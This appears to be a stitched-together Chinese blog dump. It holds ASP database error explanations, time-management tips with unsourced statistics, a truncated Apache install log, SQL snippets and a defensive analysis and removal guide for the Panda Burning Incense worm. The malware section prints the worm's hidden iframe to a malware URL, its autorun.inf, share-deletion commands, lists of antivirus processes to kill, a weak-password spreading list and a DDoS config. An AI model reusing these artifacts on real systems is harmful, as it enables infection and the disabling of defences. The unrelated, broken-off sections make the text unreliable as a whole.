殊途哲

ADODB.Recordset 错误 ‘800a0bb9′变量或者类型不正确，或者不在可以接受的范围之内，要不就是与其他数据冲突。

产生错误可能原因：

1.这个错误多出现在类似语句处：“rs.Open sql,conn,1,1”，原因是数据库连接conn对象未打开。

――――――――――――――――――――――――――――――――――――

不能打开注册表关键字(8007000e)
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘8007000e’

[Microsoft] [ODBC Microsoft Access Driver]常见错误 不能打开注册表关键字 ‘Temporary (volatile)  Jet DSN for process 0×11b4 Thread 0×1a4c DBC 0×9d34354 Jet’。

产生错误可能原因：

1.打开数据库时写法不对，标准的ACCESS数据库调用写法：

“driver={Microsoft Access Driver (*.mdb)};dbq=” & server.mappath(”db.MDB”)

2. 正在上传数据库文件。
――――――――――――――――――――――――――――――――――――

参数不足，期待是 1 (80040e10)

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e10′

[Microsoft][ODBC Microsoft Access Driver] 参数不足，期待是 1。

产生错误可能原因：

1.打开数据的SQL查询语句WHERE后面条件子句有问题，一般是缺少逻辑比较符号或者是字段名不正确。

――――――――――――――――――――――――――――――――――――
一般性网络错误。请检查网络文档(80004005)
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80004005′ [Microsoft][ODBC SQL Server Driver][TCP/IP Sockets]一般性网络错误。请检查网络文档。

产生错误可能原因：

1.数据库连接书写不正确，可能数据库名、服务器名错误。

2.数据库服务器重启中。

――――――――――――――――――――――――――――――――――――

不能使用 ”；文件已在使用中(80004005)
Microsoft JET Database Engine 错误 ‘80004005′

不能使用 ”；文件已在使用中。

产生错误可能原因：

1.文件可能正被占用：上传、压缩、打包。

2.可能程序代码中形成了嵌套包含，重复包含的数据库调用文件。
――――――――――――――――――――――――――――――――――――

不能更新。数据库或对象为只读/操作必须使用一个可更新的查询 (80004005)
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80004005′

[Microsoft][ODBC Microsoft Access Driver] 操作必须使用一个可更新的查询。

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80004005′ [Microsoft][ODBC Microsoft Access Driver] 不能更新。数据库或对象为只读。

产生错误可能原因：

1.数据库文件权限不够。

2.文件占用空间达到磁盘限额上限。

――――――――――――――――――――――――――――――――――――

未发现数据源名称并且未指定默认驱动程序(80004005)
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80004005′

[Microsoft][ODBC 驱动程序管理器] 未发现数据源名称并且未指定默认驱动程序

产生错误可能原因：

1.使用了ODBC连接数据库，服务器上没有配置ODBC数据库，改用OLEDB的标准调用方式：

“Driver={SQL Server};Database=dbname;Server=srv;Uid=user;Pwd=pd”可以解决

Provider 错误 ‘80004005′

――――――――――――――――――――――――――――――――――――

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80004005′

未指定的错误

/pcn/conn.asp，行8

产生错误可能原因：

1.从出现错误的页面名称来看，是连接数据库时出现的问题。最大的可能是无法连接数据库，和上面“一般性网络错误。。。”是同性质的问题。这时需要检查数据库服务器是否正常。这类错误一般出现在连接 MS SQLServer 数据库上。

ADODB.Recordset 错误 ‘800a0e7d’

――――――――――――――――――――――――――――――――――――

ADODB.Recordset 错误 ‘800a0e7d’

连接无法用于执行此操作。在此上下文中它可能已被关闭或无效。

/index.asp，行 9
产生错误可能原因：

1.在程序中使用了一个已经关闭或者是还没打开的数据库连接。

Server.CreateObject 失败
――――――――――――――――――――――――――――――――――――

服务器对象 错误 ‘ASP 0177 : 800401f3′

Server.CreateObject 失败

/xxxxx.asp，行155

无效的 ProgID。 若要获取关于此消息的更多的信息，请访问 Microsoft 联机支持站点: http://www.microsoft.com/contentredirect.asp 。

产生错误可能原因：

.该错误多数出现在创建组件时，说明程序使用的组件，服务器不支持，需要注册所用的组件。常见于各种使用了上传组件的ASP页面。

三、时间管理的十大关键

（一）时间管理第一大关键是设立明确的目标；成功等于目标，时间管理的目的是让你在最短时间内实现更多你想要实现的目标； 你必须把今年度4到10个目标写出来，找出一个核心目标，并依次排列重要性，然后依照你的目标设定一些详细的计划，你的关键就是依照计划进行。

（二）第二个时间管理的关键是你要列一张总清单，把今年所要做的每一件事情都列出来，并进行目标切割；1． 年度目标切割成季度目标，列出清单，每一季度要做哪一些事情；2． 季度目标切割成月目标，并在每月初重新再列一遍，碰到有突发事件而更改目标的情形便及时调整过来；3． 每一个星期天，把下周要完成的每件事列出来；4． 每天晚上把第二天要做的事情列出来。

（三）第三个时间管理的关键是20：80定律；用你80%的时间来做20%最重要的事情，因此你一定要了解，对你来说，哪些事情是最重要的，是最有生 产力的。谈到时间管理，有所谓紧急的事情、重要的事情，然而到底应做哪些事情? 当然第一个要做的一定是紧急又重要的事情，通常这些都是一些突发困扰，一些灾难，一些迫不及待要解决的问题。当你天天处理这些事情时，表示你时间管理并不 理想。成功者花最多时间在做最重要，可是不紧急的事情，这些都是所谓的高生产力的事情。然而一般人都是做紧急但不重要的事。你必须学会如何把重要的事情变 得很紧急，这时你就会立刻开始做高生产力的事情了。

（四）第四个时间管理的关键就是每天至少要有半小时到1小时的不被干扰时间；假如你能有一个小时完全不受任何人干扰，自己关在自己的房间里面，思考一 些事情，或是做一些你认为最重要的事情。这一个小时可以抵过你一天的工作效率，甚至有时候这一小时比你三天工作的效率还要好。

（五）第五个时间管理的关键是要和你的价值观相吻合，不可以互相矛盾；你一定要确立你个人的价值观，假如价值观不明确，你就很难知道什么对你最重要， 当你价值观不明确，时间分配一定不好。时间管理的重点不在管理时间，而在于如何分配时间。你永远没有时间做每件事，但你永远有时间做对你来说最重要的事。

（六）第六个时间管理关键：每一分钟每一秒做最有效率的事情；你必须思考一下要做好一份工作，到底哪几件事情是对你最有效率的，列下来，分配时间做它做好。（始终直瞄靶心–绩效<=>晋升）

（七）第七个时间管理的关键要充分地授权；列出你目前生活中所有觉得可以授权的事情，把它们写下来，然后开始找人授权，找适当的人来授权，这样效率会比较好。

（八）第八个时间管理的关键：同一类的事情最好一次把它做完；假如你在做纸上作业，那段时间都做纸上作业；假如你是在思考，用一段时间只作思考；打电话的话，最好把电话累积到某一时间一次把它打完。当你重复做一件事情时，你会熟能生巧，效率一定会提高。

（九）第九个时间管理的关键：做好时间日志；你花了多少时间在哪些事情，把它详细地记录下来，每天从刷牙开始，洗澡，早上穿衣花了多少时间，早上搭车的时 间，早上出去拜访客户的时间，把每天花的时间一一记录下来，做了哪些事，你会发现浪费了哪些时间。当你找到浪费时间的根源，你才有办法改变。

（十）第十个时间管理的关键：时间大于金钱，用你的金钱去换取别人的成功经验，一定要跟顶尖人士学习；千万要仔细选择，你所接触的对象，因为这会节省你很多时间，假设与一个成功者在一起，他花了四十年时间成功，你跟十个这样的人一起，你是不是就浓缩了四百年的经验?

四、时间管理的一些理论

第一个是“6点优先工作制”，就是要求每天全力以赴做6件最重要的事。这个方法是咨询大师艾维利提出的价值2.5万美元的时间管理方法；

第二个是帕累托原则，其核心内容是生活中80%的结果几乎是源于20%的活动，即二八理论。根据这一原则，我们应该首先完成那些紧急又重要的工作，其次是 重要而非紧急的任务，再次是紧急而非重要的工作，最后是那些既不重要也不紧急的工作。掌握这一点很重要，它可以决定你今晚是看电影还是去写一个报告。

第三个理论是莫法特休息法，也就是不要长时间的做同一种工作，而是要经常的做不同内容的工作，保持精神上的兴奋点，进行主动的调剂和放松。

第四个是麦肯锡30秒电梯理论，据说麦肯锡曾经丢掉过一个客户，原因是这个客户董事长在电梯里碰到了麦肯锡的项目经理，要求他谈谈项目的结果，可怜的项目 经理没有在电梯运行的短短30秒内把结果说清楚。后来麦肯锡就要求员工要表达清楚，直奔主题，凡事要归纳在3条以内。这就是30秒电梯理论，或者电梯演 讲。

五、节省时间的方法

1. 对目标、任务、会议等事件分别按优先级进行排序。

2. 从优先级最高的事物着手。

3. 和拖延做斗争，如果事情重要，从现在开始做。

4. 把大的、艰难的任务细分为小的、容易的部分。

5. 为自己创造一小时的宁静，哪怕这需要很强的意志力，或者有时不起作用。

6. 找到一个隐蔽的地方，如图书馆或空闲的办公室。

7. 当你有重要的事情要处理时，学会对别人说“不”。

8. 学会委派别人做事。

9. 归纳相似的事情，把它们放在一起处理。

10. 减少例行事务：它们不值得花费过多时间。缩短低价值的事件。抛开没有价值的信件和文书工作。委派别人完成、减少或推迟优先级很低的任务。

11. 避免完美主义。记住80/20 定律。

12. 避免作出过多许诺。对你在有限时间内能完成的工作持现实态度。

13. 不要把时间表排得满满的，为自己留下一定机动时间应付突发事件。

14. 设置时间限制。例如，做某些决定时，不应超过3 分钟。

15. 聚精会神地做手头的事情。

16. 处理重要事情时，使用大块的时间。

17. 迅速处理困难的事情，等待和拖延不会使它们变容易。

18. 文书工作争取只处理一次。

19. 在行动以前，彻底地思索整件工作。

20. 第一次就做好。

一、为什么要进行时间管理？

时间是财富！想想吧，如果你每天都收到86400美元，而要 求你每天必须把它用完，那你会如何运用？天下真有如此的好事？事实上，有。那就是时间。我们每个人每天都有86400秒进帐，合理的利用他们，你就可以创 造财富，爱情，成功，健康等。人生最宝贵的两项资产，一项是头脑，一项是时间。无论你做什么事情，即使不用脑子，也要花费时间。因此，管理时间的水平高 低，会决定你事业和生活的成败。每个星期有168 个小时，其中56 个小时在睡眠中度过，21 个小时在吃饭和休息中度过，剩下的91 个小时则由你来决定做什么——每天13 个小时。如何根据你的价值观和目标管理时间，是一项重要的技巧。它使你能控制生活，善用时间，朝自己的方向前进，而不致在忙乱中迷失方向。

二、我为什么浪费时间？

原因很多，有主观的原因，也有客观的原因。主观原因是一个人 浪费时间的根源，因此我们看一下主观原因：（1）做事目标不明确；（2）作风拖拉；（3）缺乏优先顺序，抓不住重点；（4）过于注重细节；（5）做事有头 无尾；（6）没有条理，不简洁，简单事情复杂化；（7）事必亲躬，不懂得授权；（8）不会拒绝别人的请求；（9）消极思考。

一些数据：

（1）人们一般每8 分钟会收到1 次打扰，每小时大约7 次，或者说每天50-60 次。平均每次打扰大约是5 分钟，总共每天大约4 小时，也就是约50%。80%（约3 小时）的打扰是没有意义或者极少有价值的。

（2）工作繁忙的人与配偶或其他重要人物的有意义的交流平均每天少于2 分钟。

（3）工作繁忙的人同其孩子的有意义的交流平均每天少于30秒钟。

（4）80% 的人不想在星期一早上上班。只有60%的人不想在星期五上班。

（5）人们一般采用13 种不同的方法管理他们的时间。

（6）每天自学1 小时，7 小时一周，365 小时一年，一个人可以像全日制学生一样学习。3-5 年就可以成为专家。

（7）平均每天，全国有170000，000 个会议。

（8）95%的书籍是由5%的人购买的。所有的出版物中间95%没有派过一次用场。

（9）如果经济独立了，97% 的工人不愿意为他们的老板干活或者从事他们现在的职业。

（10）20%的工作时间是“关键性的”、“重要的”。80%的时间用在了无意义的事情上。

（11）过去20 年里，工作的时间增加了15%，娱乐闲暇时间减少了33%。

（12）一个人如果工作桌上乱七八糟，他平均每天会为找东西或者多余耗费花1 个半小时，每周7 个半小时。

（13）平均阅读速度大约是每分钟200 个词，如果每个工作的人每天阅读2 小时，将其阅读速度提高到每分钟400 个词，则每天可以节约1 小时时间用于工作。

（14）参加健美活动的人90%会在开始的90 天内半途而废。

（15）10 个人中有9 个人会在会议开始的时候做白日梦。

（16）60% 的会议出席者会做记录以显示他/她在听。

（17）上班族中间，40%的人 不吃早饭，39%不吃中饭。吃中饭的人当中50%的人吃中饭的时间在15 分钟以下。

（18）形成新的工作习惯或者情感一般要用30 天。

（19）爱生气的人比一般人容易得心脏病的几率要高1 倍。75% 的心脏病发生在当地时间的早上5:00 - 8:00 。心脏病最容易在星期一发作。

（20）25% 的病假是因为生病而假，75%的病假是其他理由而假。

（21）我们感到要发生的事情95%不会发生。

（22）每周5 天，每天花5 分钟改进自己的工作，在5 年里将导致同一个工作被改进1200 余次。

（23）三分之一的人每年调换工作1次。

（24）五分之一的人一年搬家一次。

（25）70% 的人希望拥有自己的公司。

（26）75% 的人都说自己太累。

（27）上班族的平均睡觉时间是每晚6 小时57 分。

（28）80% 的危机和纠纷（内耗）是可以避免的。

（29）受邀开会的人80%希望在日期和时间方面具有选择性。

（30）善于利用时间的人不会把时间花在需要的事情上，而会花在值得的事情上。

（31）时间管理当中最有用的词是不。

（32）企业界的人用笔记本记录下来的事情70%是“不得不做”的。

（33）企业界的人用笔记本记录下来的事情5%是“不得不做并且想做”的。

（34）做一件事情实际花费的时间往往会比预期的时间要多一倍。

（35）如果你让自己一天做一件事情，你会花一个整天去做。如果你让自己一天做两件事情，你也会完成它。如果你让自己一天做12 件事情，则会完成7-8 件事。

（36）花1 个小时进行计划，行动时会节约10 小时。

（37）20/80 规律。80%的结果来自20%的努力；20%的结果来自80%的努力。

（38）我们能够记住10%的阅读信息，20%的听觉信息，30%的视觉信息；50%的视觉和听觉信息，70%的表达信息，90%的行为信息。

（39）上班的人平均每天发出和接收190 条讯息。

（40）我们现在拥有的知识，有一半是在近10 年内产生的。也就是说，世界上的知识在十年内增加了一倍，而且据说每18 个月再翻一番。

1 $ sudo apt-get install apache2

[sudo] password for admin:输入所设置的密码

2 正在读取软件包列表… 完成
正在分析软件包的依赖关系树
Reading state information… 完成
将会安装下列额外的软件包：
apache2-mpm-worker apache2-utils apache2.2-common libapr1 libaprutil1 libpq5
建议安装的软件包：
apache2-doc
下列【新】软件包将被安装：
apache2 apache2-mpm-worker apache2-utils apache2.2-common libapr1
libaprutil1 libpq5
共升级了 0 个软件包，新安装了 7 个软件包，要卸载 0 个软件包，有 8 个软件未被升级。
需要下载 481kB/2182kB 的软件包。
解压缩后会消耗掉 6226kB 的额外空间。
您希望继续执行吗？[Y/n] 按y

3 获取：1 http://cn.archive.ubuntu.com gutsy/main apache2-mpm-worker 2.2.4-3build1 [439kB]
获取：2 http://cn.archive.ubuntu.com gutsy/main apache2 2.2.4-3build1 [41.8kB]
更换介质：请把标有
“Edubuntu 7.10 _Gutsy Gibbon_ - Release i386 Binary-1 (20071016)”
的碟片插入驱动器“/cdrom/”再按回车键

把安装光盘放入光驱，按下回车

4 下载 481kB，耗时 2m3s (3884B/s)
选中了曾被取消选择的软件包 libapr1。
(正在读取数据库 … 系统当前总共安装有 104852 个文件和目录。)
正在解压缩 libapr1 (从 …/libapr1_1.2.7-8.2ubuntu1_i386.deb) …
选中了曾被取消选择的软件包 libpq5。
正在解压缩 libpq5 (从 …/libpq5_8.2.5-1.1_i386.deb) …
选中了曾被取消选择的软件包 libaprutil1。
正在解压缩 libaprutil1 (从 …/libaprutil1_1.2.7+dfsg-2build1_i386.deb) …
选中了曾被取消选择的软件包 apache2-utils。
正在解压缩 apache2-utils (从 …/apache2-utils_2.2.4-3build1_i386.deb) …
选中了曾被取消选择的软件包 apache2.2-common。
正在解压缩 apache2.2-common (从 …/apache2.2-common_2.2.4-3build1_i386.deb) …
选中了曾被取消选择的软件包 apache2-mpm-worker。
正在解压缩 apache2-mpm-worker (从 …/apache2-mpm-worker_2.2.4-3build1_i386.deb) …
选中了曾被取消选择的软件包 apache2。
正在解压缩 apache2 (从 …/apache2_2.2.4-3build1_all.deb) …
正在设置 libapr1 (1.2.7-8.2ubuntu1) …

正在设置 libpq5 (8.2.5-1.1) …

正在设置 libaprutil1 (1.2.7+dfsg-2build1) …

正在设置 apache2-utils (2.2.4-3build1) …
正在设置 apache2.2-common (2.2.4-3build1) …
Module alias installed; run /etc/init.d/apache2 force-reload to enable.
Module autoindex installed; run /etc/init.d/apache2 force-reload to enable.
Module dir installed; run /etc/init.d/apache2 force-reload to enable.
Module env installed; run /etc/init.d/apache2 force-reload to enable.
Module mime installed; run /etc/init.d/apache2 force-reload to enable.
Module negotiation installed; run /etc/init.d/apache2 force-reload to enable.
Module setenvif installed; run /etc/init.d/apache2 force-reload to enable.
Module status installed; run /etc/init.d/apache2 force-reload to enable.
Module auth_basic installed; run /etc/init.d/apache2 force-reload to enable.
Module authz_default installed; run /etc/init.d/apache2 force-reload to enable.
Module authz_user installed; run /etc/init.d/apache2 force-reload to enable.
Module authz_groupfile installed; run /etc/init.d/apache2 force-reload to enable.
Module authn_file installed; run /etc/init.d/apache2 force-reload to enable.
Module authz_host installed; run /etc/init.d/apache2 force-reload to enable.

正在设置 apache2-mpm-worker (2.2.4-3build1) …
* Starting web server apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 172.19.28.200 for ServerName
[ OK ]

正在设置 apache2 (2.2.4-3build1) …
Processing triggers for libc6 …
ldconfig deferred processing now taking place

5 安装完成，开始配置apache:

sudo gedit /etc/apache2/apache2.conf

1) 更改服务器根目录 ServerRoot “/www/mypages”

2）

6

1 对两组数据进行比较，找出在一个中有而另一个中没有的：
select * into tname3 from tname1 where key not in (select key from tname2)

2 学会了使用“作业”，就可以定时完成工作了 。

3  合并表：

insert tablea(a,b,c) slect a,b,c from tableb

在动手查杀熊猫烧香病毒之前，强烈建议先注意以下四点：

• 　　1.本文包含两种熊猫烧香病毒变种的描述，请注意查看病毒症状，根据实际情况选用不同的查杀方法。
• 　　2.对于被熊猫烧香病毒感染的.exe可执行文件，推荐先备份，再修复！
• 　　3.找回被熊猫烧香病毒删除的ghost(.gho)文件，详情请见文中！
• 　　4.对计算机了解不多的用户，请在专家指导下清除熊猫烧香病毒。

熊猫烧香病毒变种一：病毒进程为“spoclsv.exe”

　　这是“熊猫烧香”早期变种之一，特别之处是“杀死杀毒软件”，最恶劣之处在于感染全盘.exe文件和删除.gho文件（Ghost的镜像文件）。

　　最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码，且一定要清除。否则访问了有此代码的网页，又会感染。

　　其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。

　　病毒描述：

　　“武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，（.gho为GHOST的备份文件），使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

熊猫烧香病毒（非原图）

被感染的程序（实际图）

　　以下是熊猫烧香病毒详细行为和解决办法：

　　熊猫烧香病毒详细行为：

　　1.复制自身到系统目录下：

　　%System%\drivers\spoclsv.exe（“%System%”代表Windows所在目录，比如：C:\Windows）

　　不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。

　　2.创建启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　”svcshare”=”%System%\drivers\spoclsv.exe”

　　3.在各分区根目录生成病毒副本：
　　X:\setup.exe
　　X:\autorun.inf

　　autorun.inf内容：

　　[AutoRun]
　　OPEN=setup.exe
　　shellexecute=setup.exe
　　shell\Auto\command=setup.exe

　　4.使用net share命令关闭管理共享：

　　cmd.exe /c net share X$ /del /y
　　cmd.exe /c net share admin$ /del /y

　　5.修改“显示所有文件和文件夹”设置：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
　　”CheckedValue”=dword:00000000

　　6.熊猫烧香病毒尝试关闭安全软件相关窗口：

　　天网
　　防火墙
　　进程
　　VirusScan
　　NOD32
　　网镖
　　杀毒
　　毒霸
　　瑞星
　　江民
　　黄山IE
　　超级兔子
　　优化大师
　　木马清道夫
　　木馬清道夫
　　QQ病毒
　　注册表编辑器
　　系统配置实用程序
　　卡巴斯基反病毒
　　Symantec AntiVirus
　　Duba
　　Windows 任务管理器
　　esteem procs
　　绿鹰PC
　　密码防盗
　　噬菌体
　　木马辅助查找器
　　System Safety Monitor
　　Wrapped gift Killer
　　Winsock Expert
　　游戏木马检测大师
　　超级巡警
　　msctls_statusbar32
　　pjf(ustc)
　　IceSword

　　7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程：

　　Mcshield.exe
　　VsTskMgr.exe
　　naPrdMgr.exe
　　UpdaterUI.exe
　　TBMon.exe
　　scan32.exe
　　Ravmond.exe
　　CCenter.exe
　　RavTask.exe
　　Rav.exe
　　Ravmon.exe
　　RavmonD.exe
　　RavStub.exe
　　KVXP.kxp
　　KvMonXP.kxp
　　KVCenter.kxp
　　KVSrvXP.exe
　　KRegEx.exe
　　UIHost.exe
　　TrojDie.kxp
　　FrogAgent.exe
　　Logo1_.exe
　　Logo_1.exe
　　Rundl132.exe

　　8.禁用安全软件相关服务：

　　Schedule
　　sharedaccess
　　RsCCenter
　　RsRavMon
　　KVWSC
　　KVSrvXP
　　kavsvc
　　AVP
　　McAfeeFramework
　　McShield
　　McTaskManager
　　navapsvc
　　wscsvc
　　KPfwSvc
　　SNDSrvc
　　ccProxy
　　ccEvtMgr
　　ccSetMgr
　　SPBBCSvc
　　Symantec Core LC
　　NPFMntor
　　MskService
　　FireSvc

　　9.删除安全软件相关启动项：

　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

　　10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：

　　<iframe src=”hxxp://www.ctv163.com/wuhan/down.htm” width=”0″ height=”0″ frameborder=”0″> </iframe>

　　但不修改以下目录中的网页文件：

　　C:\WINDOWS
　　C:\WINNT
　　C:\system32
　　C:\Documents and Settings
　　C:\System Volume Information
　　C:\Recycled
　　Program Files\Windows NT
　　Program Files\WindowsUpdate
　　Program Files\Windows Media Player
　　Program Files\Outlook Express
　　Program Files\Internet Explorer
　　Program Files\NetMeeting
　　Program Files\Common Files
　　Program Files\ComPlus Applications
　　Program Files\Messenger
　　Program Files\InstallShield Installation Information
　　Program Files\MSN
　　Program Files\Microsoft Frontpage
　　Program Files\Movie Maker
　　Program Files\MSN Gamin Zone

　　11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。

　　12.此外，病毒还会尝试删除GHO文件。

　　病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中：
　　password
　　harley
　　golf
　　pussy
　　mustang
　　shadow
　　fish
　　qwerty
　　baseball
　　letmein
　　ccc
　　admin
　　abc
　　pass
　　passwd
　　database
　　abcd
　　abc123
　　sybase
　　123qwe
　　server
　　computer
　　super
　　123asd
　　ihavenopass
　　godblessyou
　　enable
　　alpha
　　1234qwer
　　123abc
　　aaa
　　patrick
　　pat
　　administrator
　　root
　　sex
　　god
　　fuckyou
　　fuck
　　test
　　test123
　　temp
　　temp123
　　win
　　asdf
　　pwd
　　qwer
　　yxcv
　　zxcv
　　home
　　xxx
　　owner
　　login
　　Login
　　love
　　mypc
　　mypc123
　　admin123
　　mypass
　　mypass123
　　Administrator
　　Guest
　　admin
　　Root

　　病毒文件内含有这些信息：

　　whboy
　　***武*汉*男*生*感*染*下*载*者***

　　解决方案：

　　1. 结束病毒进程：

　　%System%\drivers\spoclsv.exe

　　不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。但可用此方法清除。

　　“%System%\system32\spoclsv.exe”是系统文件。（目前看来没有出现插入该系统进程的变种，不排除变种的手法变化。）

　　查看当前运行spoclsv.exe的路径，可使用超级兔子魔法设置。

　　2. 删除病毒文件：

　　%System%\drivers\spoclsv.exe

　　请注意区分病毒和系统文件。详见步骤1。

　　3. 删除病毒启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　”svcshare”=”%System%\drivers\spoclsv.exe”

　　4. 通过分区盘符右键菜单中的“打开”进入分区根目录，删除根目录下的病毒文件：

　　X:\setup.exe
　　X:\autorun.inf

　　5. 恢复被修改的“显示所有文件和文件夹”设置：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
　　”CheckedValue”=dword:00000001

　　6. 修复或重新安装被破坏的安全软件。

　　7.修复被感染的程序。可用专杀工具进行修复，收集了四个供读者使用。金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具。也可用手动方法（见本文末）。

　　8. 恢复被修改的网页文件，可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件，一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。

熊猫烧香病毒变种二：病毒进程为“FuckJacks.exe”

　　以下是数据安全实验室提供的信息与方法。

　　病毒描述：

　　含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。

　　病毒基本情况：

　　[文件信息]

　　病毒名: Virus.Win32.EvilPanda.a.ex$
　　大小: 0xDA00 (55808), (disk) 0xDA00 (55808)
　　SHA1  : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
　　壳信息: 未知
　　危害级别：高

　　病毒名: Flooder.Win32.FloodBots.a.ex$
　　大  小: 0xE800 (59392), (disk) 0xE800 (59392)
　　SHA1  : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
　　壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24
　　危害级别：高

　　病毒行为：

　　Virus.Win32.EvilPanda.a.ex$ ：

　　1、病毒体执行后，将自身拷贝到系统目录：

　　%SystemRoot%\system32\FuckJacks.exe
　　
　　2、添加注册表启动项目确保自身在系统重启动后被加载：

　　键路径：HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：FuckJacks
　　键值：”C:WINDOWS\system32\FuckJacks.exe”

　　键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：svohost
　　键值：”C:WINDOWS\system32\FuckJacks.exe”

　　3、拷贝自身到所有驱动器根目录，命名为Setup.exe，并生成一个autorun.inf使得用户打开该盘运行病毒，并将这两个文件属性设置为隐藏、只读、系统。

　　C:autorun.inf    1KB    RHS
　　C:setup.exe    230KB    RHS

　　4、关闭众多杀毒软件和安全工具。

　　5、连接*****.3322.org下载某文件，并根据该文件记录的地址，去www.****.com下载某ddos程序，下载成功后执行该程序。

　　6、刷新bbs.qq.com，某QQ秀链接。

　　7、循环遍历磁盘目录，感染文件，对关键系统文件跳过，不感染Windows媒体播放器、MSN、IE 等程序。

　　Flooder.Win32.FloodBots.a.ex$ ：

　　1、病毒体执行后，将自身拷贝到系统目录：

　　%SystemRoot%\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）
　　%SystemRoot%\system32\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）

　　2、该病毒后下载运行后，添加注册表启动项目确保自身在系统重启动后被加载：

　　键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：Userinit
　　键值：”C:WINDOWS\system32\SVCH0ST.exe”

　　3、连接ddos2.****.com，获取攻击地址列表和攻击配置，并根据配置文件，进行相应的攻击。

　　配置文件如下：

　　www。victim.net:3389
　　www。victim.net:80
　　www。victim.com:80
　　www。victim.net:80
　　1
　　1
　　120
　　50000　　

　　解决方案：

　　1. 断开网络

　　2. 结束病毒进程：%System%\FuckJacks.exe

　　3. 删除病毒文件：%System%\FuckJacks.exe

　　4. 右键点击分区盘符，点击右键菜单中的“打开”进入分区根目录，删除根目录下的文件：

　　X:\autorun.inf
　　X:\setup.exe

　　5. 删除病毒创建的启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　”FuckJacks”=”%System%\FuckJacks.exe”

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
　　”svohost”=”%System%\FuckJacks.exe”

　　6. 修复或重新安装反病毒软件

　　7. 使用反病毒软件或专杀工具进行全盘扫描，清除恢复被感染的exe文件。也可用以下的手动方法恢复文件。

　　手动恢复中毒文件（在虚拟机上通过测试，供参考）

　　1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件，即执行之前的步骤1、2、4、5。

　　2.打开“运行”输入“gpedit.msc”打开组策略－本地计算机策略－windows设置－安全设置－软件限制策略－其它规则。在其它规则上右键选择－新散列规则－打开新散列规则窗口

　　3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择－不允许的。确定后重启。

　　4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项（不会有问题的）。

　　5.双击运行被感染的程序已经恢复原来样子了。全部回复后，用SREng把FuckJacks.exe在注册表里的启动项删除即可！

学习环境：Win XP SP2+SQL2000

一 create

create做为sql的创建命令，主要用于数据库、视图、表的创建。SQL语句范例为：

１　create database DBname :创建以DBname为名称的数据库

如执行create database learnter，产生的结果为：

CREATE DATABASE 进程正在磁盘 ‘learnter’ 上分配 0.75 MB 的空间。
